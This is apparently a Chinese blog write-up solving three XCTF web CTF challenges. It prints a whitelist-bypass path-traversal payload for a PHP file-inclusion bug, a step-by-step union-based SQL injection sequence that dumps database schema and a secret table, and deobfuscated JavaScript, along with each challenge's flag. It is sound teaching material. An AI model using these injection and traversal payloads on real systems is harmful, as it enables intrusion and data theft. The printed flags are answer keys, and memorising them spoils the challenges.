前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

warmup

题目介绍

解题思路

访问靶场

查看source.php

查看hint.php

绕过

构造payload

找到flag

NewsCenter

题目介绍

解题思路

访问靶场

sql手工注入

找到flag

NaNNaNNaNNaN-Batman

题目介绍

解题思路

查看文件

加上后缀名,以html形式打开

将eval函数改为alert

查看代码

返回eval页面

找到flag

warmup

题目介绍

解题思路

访问靶场

F12查看源代码

查看source.php

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>

查看hint.php

发现flag在ffffllllaaaagggg下

绕过

步骤一:

只要我们传的参数是source.php或者hint.php则返回真

如果不满足继续往下判断

步骤二:

取传进参数首次出现?前的部分

再进行白名单判断

如果还不满足继续往下判断

步骤三:

先把传进的参数做urldecode

接着就和第二步一样

都不满足就输出"you can't see it"并且返回假

要想满足这些条件那我们传的参数就只能是这种形式

构造payload

http://111.200.241.244:57432/source.php?file=hint.php?/../../../../../../ffffllllaaaagggg

找到flag

flag{25e7bce6005c4e0c983fb97297ac6e5a}

NewsCenter

题目介绍

解题思路

访问靶场

sql手工注入

判断是否具有注入点

1' and 1=1-- -

查看列数

1' order by 3-- -

从1开始试,到4页面回显不正常,所以才用到3

联合查询

1' union select 1,2,3-- -

查找库名

查找表名

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'-- -

查找字段

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news'-- -

news表下没有找到flag,查看secret_table表

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'-- -

查看字段值(flag)

1' union select 1,2,(select group_concat(id,0x3a,fl4g) from secret_table)-- -

找到flag

QCTF{sq1_inJec7ion_ezzz}

NaNNaNNaNNaN-Batman

题目介绍

解题思路

查看文件

加上后缀名,以html形式打开

将eval函数改为alert

查看页面

查看代码

function $(){var e=document.getElementById("c").value;if(e.length==16)if(e.match(/^be0f23/)!=null)if(e.match(/233ac/)!=null)if(e.match(/e98aa$/)!=null)if(e.match(/c7be9/)!=null){var t=["fl","s_a","i","e}"];var n=["a","_h0l","n"];var r=["g{","e","_0"];var i=["it'","_","n"];var s=[t,n,r,i];for(var o=0;o<13;++o){document.write(s[o%4][0]);s[o%4].splice(0,1)}}}document.write('<input id="c"><button onclick=$()>Ok</button>');delete

返回eval页面

满足正则

满足length==16,正则的话^为开始符号,$为结尾符号,拼接一下:be0f233ac7be98aa,输入就拿到flag了。

找到flag

flag{it's_a_h0le_in_0ne}

攻防世界WEB高手进阶区warmup,NewsCenter,NaNNaNNaNNaN-Batman相关推荐

  1. 攻防世界-web高手进阶区

    文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

  2. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  3. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  4. 攻防世界 web高手进阶区 8分题 Web_python_block_chain

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...

  5. 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp

    文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...

  6. 攻防世界 web高手进阶区 9分题 bilibili

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...

  7. 攻防世界 web高手进阶区 7分题Confusion1

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...

  8. XCTF 攻防世界 web 高手进阶区

    文章目录 ics-07 shrine( flask + jinja2 的 SSTI) easytornado(模板注入) upload(文件名注入) supersqli(堆叠注入) php_rce(T ...

  9. 攻防世界——web高手进阶区题解

    目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含  +  preg_replace函数漏洞) 3,ics-06(爆破id) 4,l ...

最新文章

  1. 使用matlab进行mex编译时的路径问题mexopts
  2. ssh跳板登陆太麻烦,使用expect每次自动登录 利用expect 模拟键盘动作,在闲置时间之内模拟地给个键盘响应...
  3. 【错误记录】GitHub 网站和仓库无法访问 ( 域名重定向 | 检查 C:\Windows\System32\drivers\etc\hosts 配置文件中的 GitHub 地址域名配置 )
  4. 当视频恋爱 App 用上了 Serverless
  5. 牛客网 在线编程 局部最小值位置
  6. java 类.class_面试官:Java反射是什么?我回答不上来!
  7. transformer论文解读_【论文解读】ICLR2020 | 深度自适应Transformer
  8. Linux(debian7)操作基础(五)之per调用shell命令
  9. 关于数据库中的char与varchar
  10. 微软服务器补丁每月几号发布,微软补丁日安全通告 |9 月份
  11. 创业不难,找准项目才难,教你一眼识破好项目
  12. 绩效考核管理中的模型分析与功能设计
  13. oracle羊毛,弃Cloudflare,薅Oracle羊毛
  14. mybatis 大于等于小于等于
  15. 深度学习之美(张玉宏)——第三章 机器学习三重门
  16. 数据库完整性--断言和触发器
  17. C++:实现量化SMM Caplet α 校准测试实例
  18. 金融风控数据挖掘--Task1
  19. facebook修改权限_如何在Facebook上更改小组的隐私
  20. three.js流动线

热门文章

  1. 原生JS实现移动端短信验证码功能
  2. 最新多传感器融合基准 | Argoverse 2:用于感知和预测的下一代数据集
  3. 高等数学、可导,可微,连续,偏导数存在/连续,方向导数存在
  4. Apollo决策规划planning模块简要分析
  5. 所罗门群岛必试体验:去Uepi潜水
  6. jetbot12 之 人手目标跟踪(hand tracking)
  7. 7款好用国内外项目管理软件,让团队效率翻倍提升
  8. 安装、配置和测试Asterisk过程中遇到的问题及解决方法
  9. VSS2005源代码管理启用http方式
  10. 知言| 刘玉刚 最火的人工智能都是什么?